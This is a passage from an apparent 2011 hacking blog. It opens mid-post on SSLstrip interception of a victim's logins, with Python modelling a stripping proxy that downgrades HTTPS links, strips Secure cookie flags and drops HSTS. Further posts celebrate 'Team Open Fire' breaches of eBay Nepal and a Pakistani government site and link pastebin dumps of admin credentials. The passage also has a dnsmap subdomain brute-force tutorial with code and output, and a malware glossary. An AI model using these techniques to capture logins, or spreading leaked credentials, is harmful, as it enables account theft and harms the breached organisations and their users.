</span><br style="color: #666666;" /><span style="color: #666666;">
Once this setup is running, all of the victim's traffic is routed
through us. In particular, HTTP traffic is redirected to our port 10000,
where SSLstrip is listening. From then on the victim's logins, which would
normally have travelled over HTTPS, reach us in plain HTTP and we can read
the passwords straight off the wire. </span><br style="color: #666666;" /><span style="color: #666666;">
</span><br style="color: #666666;" /><span style="color: #666666;">
</span></b></span><div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b><br /></b></span></div>
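<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>The step people find least intuitive is 4: what does sslstrip actually do with the traffic iptables hands it? The following is an added example, not code from sslstrip itself: a minimal model of the rewriting a stripping proxy performs, run against a constructed two-page "bank" site so it works offline. It downgrades https:// links and redirects to http://, remembers which URLs it downgraded so it can fetch those over TLS itself, removes the Secure attribute from cookies so the browser keeps sending them on the plain-HTTP leg, and drops the HSTS header. The host names, pages and the <code>upstream_fetch</code> interface are assumptions made for the example.</b></span></div>

```python
import re
from urllib.parse import urlsplit

_HTTPS_URL = re.compile(r"""https://([A-Za-z0-9.-]+)(/[^\s"'<>]*)?""")


class StripProxy:
    """Model of the downgrade a stripping MITM applies between victim and server."""

    def __init__(self, upstream_fetch):
        # upstream_fetch(scheme, host, path) -> (status, [(header, value)], body)
        # stands in for the proxy's own connection to the real server.
        self.upstream_fetch = upstream_fetch
        self.stripped = set()      # (host, path) pairs the proxy must refetch over TLS

    def rewrite_body(self, text):
        """Downgrade every https:// URL in the text and remember it."""
        def downgrade(m):
            host, path = m.group(1).lower(), m.group(2) or "/"
            self.stripped.add((host, path))
            return "http://" + m.group(1) + (m.group(2) or "")
        return _HTTPS_URL.sub(downgrade, text)

    def rewrite_headers(self, headers):
        out = []
        for name, value in headers:
            key = name.lower()
            if key == "location":                      # downgrade redirects to HTTPS
                value = self.rewrite_body(value)
            elif key == "set-cookie":                  # let the cookie travel over plain HTTP
                value = re.sub(r";\s*secure(?=;|$)", "", value, flags=re.IGNORECASE)
            elif key == "strict-transport-security":   # never let the browser learn HSTS
                continue
            out.append((name, value))
        return out

    def handle_client_request(self, host, path):
        """A plain-HTTP request from the victim arrives; use TLS upstream if we downgraded it."""
        scheme = "https" if (host.lower(), path) in self.stripped else "http"
        status, headers, body = self.upstream_fetch(scheme, host, path)
        return status, self.rewrite_headers(headers), self.rewrite_body(body)


# --- Constructed target site (two pages) ------------------------------------------
FAKE_SITE = {
    ("http", "bank.example", "/"): (
        200, [("Content-Type", "text/html")],
        '<a href="https://bank.example/login">Log in</a>'),
    ("https", "bank.example", "/login"): (
        200, [("Set-Cookie", "session=abc123; Secure; HttpOnly"),
              ("Strict-Transport-Security", "max-age=31536000")],
        '<form action="https://bank.example/auth" method="post">'
        '<input name="user"><input name="pass" type="password"></form>'),
}


def fake_upstream(scheme, host, path):
    return FAKE_SITE[(scheme, host, path)]


def victim_session(proxy):
    """Victim types bank.example (plain HTTP) and then clicks the login link."""
    _, _, home = proxy.handle_client_request("bank.example", "/")
    link = re.search(r'href="([^"]+)"', home).group(1)
    u = urlsplit(link)
    _, headers, login = proxy.handle_client_request(u.hostname, u.path)
    return {"login_link": link,
            "form_action": re.search(r'action="([^"]+)"', login).group(1),
            "headers": headers}


if __name__ == "__main__":
    result = victim_session(StripProxy(fake_upstream))
    print("victim followed:          ", result["login_link"])
    print("credentials will POST to: ", result["form_action"])
    print("headers the victim sees:  ", result["headers"])
```

<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>Two practical caveats fall straight out of this model. The downgrade only works on sessions that begin over plain HTTP (a typed http:// address or a link on an HTTP page); a victim who opens https://bank.example directly never passes through the rewriting path. And a browser that has already cached an HSTS policy for the site, or has it preloaded, upgrades the request to HTTPS before it leaves the machine, so the proxy never sees it; that is precisely the defence the Strict-Transport-Security header exists for, and why the model has to drop it on first contact.</b></span></div>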
</div>
Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com1tag:blogger.com,1999:blog-3299468824600484367.post-86677384521766953222011-09-04T08:18:00.000-07:002011-09-30T23:36:43.593-07:00Ebay got hacked by team open fire<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKsxUbIvyrt261XgT3SxQZoHj2PqIBH1EU-4OX97p4LiEQNhNRahBUCEkhmHnProD6U0xDI1Gnl6vtgJF3s-a3mMD3KWJsRdcmPfLEqkCu2QiGFhTLbr9tLjdoFAuXJpDONpr9gKRxC-g/s1600/340104_1481955066650_1767058290_711821_3463368_o.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKsxUbIvyrt261XgT3SxQZoHj2PqIBH1EU-4OX97p4LiEQNhNRahBUCEkhmHnProD6U0xDI1Gnl6vtgJF3s-a3mMD3KWJsRdcmPfLEqkCu2QiGFhTLbr9tLjdoFAuXJpDONpr9gKRxC-g/s320/340104_1481955066650_1767058290_711821_3463368_o.jpg" width="320" /></a></div>
<br />
eBay Nepal got hacked by Team Open Fire<br />
<br />
Team Open Fire hacked eBay.com.np, leaking the admin username and password in public.<br />
You can find the <a href="http://pastebin.com/S1WiChW8">DB here</a>.<br /><br /><span style="font-size: small;"><b><a href="http://adf.ly/2yvsn">CLICK HERE</a></b></span></div>
Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com6tag:blogger.com,1999:blog-3299468824600484367.post-65643695420030551122011-09-04T08:13:00.000-07:002011-09-04T08:14:23.375-07:00Federally Administered Tribal Areas (FATA) of Pakistan and Afghanistan database hacked by Team Open Fire<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKsxUbIvyrt261XgT3SxQZoHj2PqIBH1EU-4OX97p4LiEQNhNRahBUCEkhmHnProD6U0xDI1Gnl6vtgJF3s-a3mMD3KWJsRdcmPfLEqkCu2QiGFhTLbr9tLjdoFAuXJpDONpr9gKRxC-g/s1600/340104_1481955066650_1767058290_711821_3463368_o.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKsxUbIvyrt261XgT3SxQZoHj2PqIBH1EU-4OX97p4LiEQNhNRahBUCEkhmHnProD6U0xDI1Gnl6vtgJF3s-a3mMD3KWJsRdcmPfLEqkCu2QiGFhTLbr9tLjdoFAuXJpDONpr9gKRxC-g/s320/340104_1481955066650_1767058290_711821_3463368_o.jpg" width="320" /></a></div>
<br />
<br />
The Federally Administered Tribal Areas (FATA) of Pakistan and Afghanistan
database was hacked by Team Open Fire & Team Blacklisted. They broke
into the DB of FATA's website and exposed a lot of sensitive information:
the DB name, tables, cities, config files, usernames and passwords, government
secrets and so on.<br />
<br />
<br />
To see the hacked DB click <a href="http://pastebin.com/mbhzm5sR"><b>Here </b></a><br />
<br /></div>
Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com0tag:blogger.com,1999:blog-3299468824600484367.post-55167215186278835322011-09-04T08:05:00.000-07:002011-09-04T08:07:45.102-07:00Bruteforce Subdomains with DNSMap<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="field field-type-filefield field-field-image" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="field-items">
<div class="field-item odd">
<span style="font-size: small;"><b>
</b><b><img alt="DNSMap" class="imagecache imagecache-460-width imagecache-default imagecache-460-width_default" height="346" src="http://greyhat-security.com/sites/default/files/imagecache/460-width/story-slideshow/mr._p/dnsmap_logo_2.png" title="" width="460" /> </b></span></div>
</div>
</div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
</b></span><br />
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b> This one's really quick. If you've ever needed to know the
subdomains of a site, consider "dnsmap". It brute-forces a list of candidate
subdomains for any domain you give it, and you can supply your own
wordlist. It's pretty simple. Here are the Linux instructions:</b></span></div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b></b></span><span style="color: #666666; font-size: small;"><b>1. Download it.</b></span><br />
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>2. Extract it:</b></span></div>
<blockquote style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div>
<span style="font-size: small;"><b><i>tar xf dnsmap-latest.tar && cd dnsmap</i></b></span></div>
</blockquote>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
</b></span><br />
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>3. Make sure you have a C compiler installed (e.g. GCC) and compile it:</b></span></div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
</b></span><br />
<blockquote style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div>
<span style="font-size: small;"><b><i>gcc dnsmap.c -o dnsmap</i></b></span></div>
</blockquote>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
</b></span><br />
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>4. Make sure it is executable (gcc already sets the execute bit, so this is only a safety check):</b></span></div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
</b></span><br />
<blockquote style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div>
<span style="font-size: small;"><b><i>chmod +x dnsmap</i></b></span></div>
</blockquote>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
</b></span><br />
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>5. Run it:</b></span></div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
</b></span><br />
<blockquote style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div>
<span style="font-size: small;"><b><i>./dnsmap domain.com</i></b></span></div>
</blockquote>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
</b></span><br />
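<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>Because dnsmap resolves a fixed wordlist, the thing that bites on real targets is a wildcard record: a zone with a catch-all *.domain answers every guess, and the run appears to "find" the entire wordlist. The following is an added example, not dnsmap's own code, of the same brute-force loop with that check built in: it resolves a few random labels first, treats any address they all share as the wildcard answer, and filters it out of the results. It runs offline against a constructed zone; <code>target.example</code>, the wordlist, the TEST-NET addresses and the <code>make_fake_resolver</code> helper are made up for the example, and <code>system_resolver</code> shows how to plug in the real OS resolver instead.</b></span></div>

```python
import random
import socket
import string


def system_resolver(name):
    """Resolve `name` with the OS resolver; sorted IPv4 list, [] if it does not exist."""
    try:
        return sorted({info[4][0] for info in socket.getaddrinfo(name, None, socket.AF_INET)})
    except socket.gaierror:
        return []


def wildcard_ips(domain, resolve, probes=3):
    """Return the set of addresses handed out for names that cannot possibly exist."""
    answers = []
    for _ in range(probes):
        label = "".join(random.choices(string.ascii_lowercase + string.digits, k=12))
        answers.append(set(resolve(f"{label}.{domain}")))
    return set.intersection(*answers)


def brute_subdomains(domain, words, resolve=system_resolver, filter_wildcard=True):
    """Brute-force <word>.<domain>; returns ({name: [ips]}, wildcard_ips)."""
    wild = wildcard_ips(domain, resolve) if filter_wildcard else set()
    found = {}
    for word in words:
        name = f"{word}.{domain}"
        ips = [ip for ip in resolve(name) if ip not in wild]
        if ips:
            found[name] = ips
    return found, wild


# --- Constructed zone for offline use ---------------------------------------------
FAKE_ZONE = {
    "www.target.example":  ["203.0.113.10"],
    "mail.target.example": ["203.0.113.20"],
    "dev.target.example":  ["203.0.113.30"],
}
WORDLIST = ["www", "mail", "ftp", "dev", "vpn", "intranet"]


def make_fake_resolver(zone, wildcard_ip=None):
    """Resolver over an in-memory zone, optionally with a catch-all *.target.example."""
    def resolve(name):
        if name in zone:
            return list(zone[name])
        if wildcard_ip and name.endswith(".target.example"):
            return [wildcard_ip]
        return []
    return resolve


if __name__ == "__main__":
    plain = make_fake_resolver(FAKE_ZONE)
    wild = make_fake_resolver(FAKE_ZONE, wildcard_ip="203.0.113.99")
    print("clean zone:             ", brute_subdomains("target.example", WORDLIST, plain)[0])
    print("naive on wildcard zone: ", brute_subdomains("target.example", WORDLIST, wild, filter_wildcard=False)[0])
    print("filtered:               ", brute_subdomains("target.example", WORDLIST, wild)[0])
```

<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>The filter has a known blind spot: a real host that is deliberately pointed at the same address as the wildcard is hidden along with the noise, so on a wildcard zone it is worth cross-checking survivors (and a sample of the dropped names) with a second data source such as certificate transparency logs or zone-transfer attempts rather than trusting the brute-force list alone.</b></span></div>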
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>6. View results:</b></span></div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
</b></span><br />
<blockquote style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div>
<span style="font-size: small;"><b><i>dnsmap - DNS Network Mapper by pagvac</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>(<a href="http://ikwt.com/" title="http://ikwt.com">http://ikwt.com</a>, <a href="http://foro.elhacker.net/" title="http://foro.elhacker.net">http://foro.elhacker.net</a>)</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>Searching subhosts on domain google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>ap.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.173.103</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:209.85.173.104</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:209.85.173.147</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:209.85.173.99</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>blog.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:72.14.207.191</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>catalog.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:74.125.19.100</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:74.125.19.101</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:74.125.19.102</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:74.125.19.113</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>catalogue.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:74.125.19.113</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:74.125.19.100</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:74.125.19.101</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:74.125.19.102</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>directory.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.173.103</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:209.85.173.104</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:209.85.173.147</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:209.85.173.99</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>download.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.173.99</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:209.85.173.103</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:209.85.173.104</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:209.85.173.147</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>downloads.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.173.147</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:209.85.173.99</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:209.85.173.103</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:209.85.173.104</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>email.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:74.125.19.100</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:74.125.19.101</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:74.125.19.102</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:74.125.19.113</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>finance.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.173.104</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:209.85.173.147</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:209.85.173.99</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:209.85.173.103</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>groups.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.171.113</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:209.85.171.100</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:209.85.171.101</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:209.85.171.102</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>images.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.173.147</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:209.85.173.99</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:209.85.173.103</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:209.85.173.104</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>labs.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:74.125.19.113</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:74.125.19.100</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:74.125.19.101</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:74.125.19.102</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>mail.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.201.18</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:209.85.201.19</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:209.85.201.83</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>mobile.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.173.193</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>news.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.171.99</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:209.85.171.103</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:209.85.171.104</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:209.85.171.147</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>photo.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:74.125.47.91</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:74.125.47.93</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:74.125.47.136</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:74.125.47.190</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>photos.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:74.125.47.190</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:74.125.47.91</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:74.125.47.93</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:74.125.47.136</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>proxy.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:64.233.169.4</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:64.233.171.4</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:64.233.179.4</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:64.233.183.4</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #5:64.233.184.4</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #6:64.233.187.4</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #7:66.102.0.4</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #8:66.102.9.4</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #9:66.102.14.225</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #10:66.102.14.241</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #11:216.239.42.4</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #12:216.239.53.4</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #13:216.239.55.5</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #14:216.239.57.4</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #15:216.239.59.4</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #16:64.233.161.4</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #17:64.233.165.4</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #18:64.233.167.4</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>research.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:74.125.19.102</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:74.125.19.113</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:74.125.19.100</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:74.125.19.101</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>sandbox.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.171.81</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>search.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.173.99</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:209.85.173.103</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:209.85.173.104</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:209.85.173.147</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>services.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.139.110</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>shopping.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.171.103</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:209.85.171.104</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:209.85.171.147</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:209.85.171.99</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>smtp.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.237.25</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>sms.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.173.147</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:209.85.173.99</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:209.85.173.103</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:209.85.173.104</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>support.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:74.125.19.101</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:74.125.19.102</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:74.125.19.113</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:74.125.19.100</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>uploads.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:72.14.243.49</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>vpn.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:64.9.224.69</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:64.9.224.70</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:64.9.224.68</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>www.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:209.85.173.104</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #2:209.85.173.147</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #3:209.85.173.99</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #4:209.85.173.103</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>www2.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:64.233.179.104</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>www3.google.com</i></b></span></div>
<div>
<span style="font-size: small;"><b><i>IP Address #1:64.233.179.104</i></b></span></div>
<div>
<span style="font-size: small;"><b><i><br /></i></b></span></div>
<div>
<span style="font-size: small;"><b><i>31 subhost(s) found</i></b></span></div>
</blockquote>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>Enjoy, and use it legally in your penetration tests.</b></span></div>
</div>
Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com1tag:blogger.com,1999:blog-3299468824600484367.post-32420487610514033432011-08-29T02:38:00.000-07:002011-08-29T02:38:07.739-07:00What is a trojan/worm/virus/logic bomb?<div dir="ltr" style="text-align: left;" trbidi="on"><b><span style="font-size: medium; line-height: normal;"><span style="color: red;">Trojan:</span></span></b><i><span style="font-size: medium; line-height: normal;"> <br />
Remember the Trojan Horse? Bad guys hid inside it until they could get <br />
into the city to do their evil deed. A trojan computer program is <br />
similar. It is a program which does an unauthorized function, hidden <br />
inside an authorized program. It does something other than what it <br />
claims to do, usually something malicious (although not necessarily!), <br />
and it is intended by the author to do whatever it does. If it's not <br />
intentional, it's called a 'bug' or, in some cases, a feature <img alt=":)" src="http://cyber-security.in/forum/smileys/cutemoticons/smile.png" /> Some <br />
virus scanning programs detect some trojans. Some virus scanning <br />
programs don't detect any trojans. No virus scanners detect all <br />
trojans. <br />
</span></i><b><span style="font-size: medium; line-height: normal;"><span style="color: #00b050;">Virus:</span></span></b><i><span style="font-size: medium; line-height: normal;"> <br />
A virus is a piece of self-replicating code which reproduces itself. It may <br />
attach to other programs, it may create copies of itself (as in <br />
companion viruses). It may damage or corrupt data, change data, or <br />
degrade the performance of your system by utilizing resources such as <br />
memory or disk space. Some virus scanners detect some viruses. No <br />
virus scanners detect all viruses. No virus scanner can protect <br />
against "any and all viruses, known and unknown, now and forevermore". <br />
</span></i><span style="font-size: medium; line-height: normal;"><b><span style="color: #0070c0;">Worm:</span></b></span><i><span style="font-size: medium; line-height: normal;"> <br />
Made famous by Robert Morris, Jr. (the 1988 Internet worm), worms are programs which reproduce <br />
by copying themselves over and over, system to system, using up <br />
resources and sometimes slowing down the systems. They are <br />
